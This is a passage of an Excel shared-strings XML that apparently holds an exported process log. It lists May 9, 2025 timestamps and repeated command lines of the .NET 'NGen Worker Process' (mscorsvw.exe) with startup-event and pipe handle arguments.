    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 344 -InterruptEvent 0 -NGENProcess 2d0 -Pipe 340 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:11.862</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 360 -InterruptEvent 0 -NGENProcess 3d0 -Pipe 370 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:11.867</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 2b4 -InterruptEvent 0 -NGENProcess 3d0 -Pipe 360 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:14.539</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 390 -InterruptEvent 0 -NGENProcess 1b4 -Pipe 3b0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:14.540</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 39c -InterruptEvent 0 -NGENProcess 338 -Pipe 244 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:15.808</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:16.165</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 300 -InterruptEvent 0 -NGENProcess 2b4 -Pipe 37c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 2b4 -InterruptEvent 0 -NGENProcess 348 -Pipe 2ec -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:16.166</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 20c -InterruptEvent 0 -NGENProcess 1b4 -Pipe 39c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:17.033</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:17.036</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:17.038</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:17.548</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 374 -InterruptEvent 0 -NGENProcess 2b4 -Pipe 2c8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 398 -InterruptEvent 0 -NGENProcess 33c -Pipe 328 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:17.549</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 2e8 -InterruptEvent 0 -NGENProcess 3a4 -Pipe 350 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3d0 -InterruptEvent 0 -NGENProcess 374 -Pipe 3fc -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:18.653</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3dc -InterruptEvent 0 -NGENProcess 2e8 -Pipe 338 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:18.658</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3ec -InterruptEvent 0 -NGENProcess 3d4 -Pipe 378 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:18.665</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 300 -InterruptEvent 0 -NGENProcess 2e8 -Pipe 3d0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:18.671</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 364 -InterruptEvent 0 -NGENProcess 314 -Pipe 2d4 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:18.676</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 1b4 -InterruptEvent 0 -NGENProcess 2d8 -Pipe 20c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:18.775</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:18.777</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:20.152</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3e8 -InterruptEvent 0 -NGENProcess 3dc -Pipe 2b0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 398 -InterruptEvent 0 -NGENProcess 3a8 -Pipe 344 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:21.288</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:21.314</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 374 -InterruptEvent 0 -NGENProcess 38c -Pipe 2d0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 2d8 -InterruptEvent 0 -NGENProcess 3a8 -Pipe 3f8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:21.347</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 334 -InterruptEvent 0 -NGENProcess 3ec -Pipe 3d4 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:26.771</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 374 -InterruptEvent 0 -NGENProcess 348 -Pipe 3a4 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:35.680</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:35.845</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3a8 -InterruptEvent 0 -NGENProcess 390 -Pipe 364 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:36.873</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 374 -InterruptEvent 0 -NGENProcess 390 -Pipe 3dc -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:36.878</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3ec -InterruptEvent 0 -NGENProcess 38c -Pipe 348 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:37.586</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:38.474</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 368 -InterruptEvent 0 -NGENProcess 3a8 -Pipe 374 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:38.478</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 33c -InterruptEvent 0 -NGENProcess 334 -Pipe 3a8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:38.483</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 1b4 -InterruptEvent 0 -NGENProcess 334 -Pipe 3e8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:38.598</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:43.408</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:43.443</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 390 -InterruptEvent 0 -NGENProcess 2b4 -Pipe 38c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:43.448</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 314 -InterruptEvent 0 -NGENProcess 334 -Pipe 2fc -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:44.441</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:44.487</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 314 -InterruptEvent 0 -NGENProcess 310 -Pipe 2f8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 368 -InterruptEvent 0 -NGENProcess 1b4 -Pipe 33c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:50.415</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 314 -InterruptEvent 0 -NGENProcess 3f4 -Pipe 304 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:52.430</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 36c -InterruptEvent 0 -NGENProcess 1e0 -Pipe 34c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:52.435</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3f0 -InterruptEvent 0 -NGENProcess 2e8 -Pipe 380 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:52.464</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 248 -InterruptEvent 0 -NGENProcess 3ac -Pipe 3ec -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:55.680</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 2b4 -InterruptEvent 0 -NGENProcess 398 -Pipe 2e8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:57.488</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 390 -InterruptEvent 0 -NGENProcess 36c -Pipe 3ac -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:57.490</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3cc -InterruptEvent 0 -NGENProcess 36c -Pipe 3f0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:38.560</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:39.949</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3d8 -InterruptEvent 0 -NGENProcess 2b4 -Pipe 390 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:42.208</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3c4 -InterruptEvent 0 -NGENProcess 3e0 -Pipe 368 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:42.209</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 384 -InterruptEvent 0 -NGENProcess 1b4 -Pipe 3cc -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:42.376</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 310 -InterruptEvent 0 -NGENProcess 3d8 -Pipe 384 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:42.391</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1b4 -Pipe 36c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 35c -Pipe 3c4 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:43.709</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 35c -InterruptEvent 0 -NGENProcess 310 -Pipe 2b4 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:43.726</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3d8 -InterruptEvent 0 -NGENProcess 3c0 -Pipe 398 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 314 -InterruptEvent 0 -NGENProcess 248 -Pipe 310 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:43.732</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 1b4 -InterruptEvent 0 -NGENProcess 334 -Pipe 3c0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:43.747</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3d8 -InterruptEvent 0 -NGENProcess 3f4 -Pipe 1e0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3f4 -InterruptEvent 0 -NGENProcess 35c -Pipe 314 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:44.747</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3e0 -InterruptEvent 0 -NGENProcess 220 -Pipe 1b4 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:44.767</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 434 -InterruptEvent 0 -NGENProcess 428 -Pipe 430 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3e0 -InterruptEvent 0 -NGENProcess 408 -Pipe 334 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:44.772</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 440 -InterruptEvent 0 -NGENProcess 41c -Pipe 404 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:44.785</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 450 -InterruptEvent 0 -NGENProcess 418 -Pipe 438 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 464 -InterruptEvent 0 -NGENProcess 418 -Pipe 458 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:44.791</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 44c -InterruptEvent 0 -NGENProcess 42c -Pipe 41c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:45.892</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 43c -InterruptEvent 0 -NGENProcess 428 -Pipe 46c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:45.894</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 44c -InterruptEvent 0 -NGENProcess 448 -Pipe 47c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:45.895</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 48c -InterruptEvent 0 -NGENProcess 424 -Pipe 474 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:45.899</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 480 -InterruptEvent 0 -NGENProcess 424 -Pipe 484 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:45.947</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 434 -InterruptEvent 0 -NGENProcess 49c -Pipe 220 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:47.593</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 424 -InterruptEvent 0 -NGENProcess 4b0 -Pipe 480 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:49.565</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 4b8 -InterruptEvent 0 -NGENProcess 414 -Pipe 300 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:50.662</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 4a0 -InterruptEvent 0 -NGENProcess 410 -Pipe 498 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:50.668</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 49c -InterruptEvent 0 -NGENProcess 4c4 -Pipe 4c8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:50.672</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3f4 -InterruptEvent 0 -NGENProcess 4d4 -Pipe 3d8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:50.677</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 4d8 -InterruptEvent 0 -NGENProcess 4e4 -Pipe 4b8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:50.682</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 4dc -InterruptEvent 0 -NGENProcess 4e4 -Pipe 4e0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:50.686</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 4e4 -InterruptEvent 0 -NGENProcess 414 -Pipe 4dc -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:50.692</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 518 -InterruptEvent 0 -NGENProcess 4f8 -Pipe 514 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:50.697</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 4c4 -InterruptEvent 0 -NGENProcess 520 -Pipe 424 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:50.702</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 528 -InterruptEvent 0 -NGENProcess 4c4 -Pipe 524 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:50.707</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 528 -InterruptEvent 0 -NGENProcess 4b0 -Pipe 520 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:50.712</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 52c -InterruptEvent 0 -NGENProcess 4f8 -Pipe 538 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:50.717</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 4f8 -InterruptEvent 0 -NGENProcess 530 -Pipe 50c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:50.723</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 550 -InterruptEvent 0 -NGENProcess 4fc -Pipe 544 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:51.705</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 530 -InterruptEvent 0 -NGENProcess 49c -Pipe 4f8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:51.713</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 530 -InterruptEvent 0 -NGENProcess 560 -Pipe 554 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:51.715</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 55c -InterruptEvent 0 -NGENProcess 35c -Pipe 4e8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:42:51.720</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 35c -InterruptEvent 0 -NGENProcess 49c -Pipe 55c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:01.596</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:04.114</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 220 -InterruptEvent 0 -NGENProcess 224 -Pipe 258 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:04.119</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:09.467</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 2fc -InterruptEvent 0 -NGENProcess 2e0 -Pipe 318 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:13.477</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 2fc -InterruptEvent 0 -NGENProcess 2dc -Pipe 300 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:13.518</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 324 -InterruptEvent 0 -NGENProcess 2e0 -Pipe 2dc -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:15.812</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 320 -InterruptEvent 0 -NGENProcess 334 -Pipe 328 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:18.859</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 2fc -InterruptEvent 0 -NGENProcess 33c -Pipe 31c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:21.245</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:21.344</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 310 -InterruptEvent 0 -NGENProcess 224 -Pipe 338 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:21.352</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 344 -InterruptEvent 0 -NGENProcess 2e8 -Pipe 354 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:21.407</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 2f4 -InterruptEvent 0 -NGENProcess 2fc -Pipe 2f0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:22.769</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 36c -InterruptEvent 0 -NGENProcess 32c -Pipe 378 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:24.649</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:24.719</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 36c -InterruptEvent 0 -NGENProcess 224 -Pipe 2fc -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:24.731</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 320 -InterruptEvent 0 -NGENProcess 310 -Pipe 2f4 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:27.340</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 2e8 -InterruptEvent 0 -NGENProcess 3a0 -Pipe 34c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
